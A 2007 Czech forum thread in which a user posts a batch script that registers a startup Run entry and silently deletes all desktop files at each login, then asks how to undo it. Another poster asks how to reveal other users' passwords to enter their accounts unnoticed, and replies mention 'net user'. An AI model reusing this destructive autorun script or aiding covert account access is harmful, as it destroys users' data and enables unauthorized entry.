Vytvoření registru na mazání ikon – Příkazový řádek – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Vytvoření registru na mazání ikon – Příkazový řádek – Fórum – Programujte.comVytvoření registru na mazání ikon – Příkazový řádek – Fórum – Programujte.com

 

Jarda0
Stálý člen
30. 1. 2007   #1
-
0
-

Jen tak jsem blbnul a vytvořil tohle

echo off 

echo Ikonky > %homedrive%\windows\y.reg
echo.>> %homedrive%\windows\y.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\y.reg
echo "ImagePath"="%homedrive%\\windows\\system_32.bat">> %homedrive%\windows\y.reg
reg import %homedrive%\windows\y.reg
echo erase /q /s "%homedrive%\documents and settings\%username%\plocha\*.*" > "%homedrive%\\windows\\system_32.bat"


na zkoušku jsem to spustil a funguje to, jenže nevim jak se toho mám zbavit, registr jsem smazal a stále to maže ikony :( Poradí někdo?

Nahlásit jako SPAM
IP: ...–
Hehe :D
Shai0
Stálý člen
1. 2. 2007   #2
-
0
-

To je kravina, jestli si to smazal z registru tak to uz nemuze jet.... ale tohle nemaze jen ikony, maze to vsechno co je na plose...

Nahlásit jako SPAM
IP: ...–
www.openservis.cz - Prestashop servis!
Tocimanko0
Grafoman
1. 2. 2007   #3
-
0
-

ShaiMagal píše:#
# To je kravina, jestli si to smazal z registru tak to uz nemuze jet.... ale tohle nemaze jen ikony, maze to vsechno co je na plose...


Pravda! Ak si vymazal to, ci si vytvoril (myslim v registry), tak to nemoze mazat!
PS. A naco by normalny clovek spustal taketo kraviny na svojom PC?

A chcem sa este spytat, ci sa neda zobrazit heslo aktualneho (pripadne admina) uzivatela. Ked sa chcete nenapadne dostat do uctu ineho cloveka, tak sa to hodi. Zmenit heslo natvrdo uz nie je take efektivne. Napriklad u vas doma ked su viaceri uzivatelia.

Nahlásit jako SPAM
IP: ...–
to_jsem_ja0
Stálý člen
2. 2. 2007   #4
-
0
-

To Tocimanko:
heslo jde změnit pouze z admin účtu, ale zobrazit nejde. pro změnění hesla použij příkaz net user

Nahlásit jako SPAM
IP: ...–
Shai0
Stálý člen
5. 2. 2007   #5
-
0
-

viz:

start -> spustit -> cmd -> net user /?

Nahlásit jako SPAM
IP: ...–
www.openservis.cz - Prestashop servis!
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 1 host

Podobná vlákna

Počítadlo ikon — založil Gordon

Rozmistění ikon na form — založil Borisek

C# Změna velikosti ikon na ploše — založil Josef Doležal

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032024 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý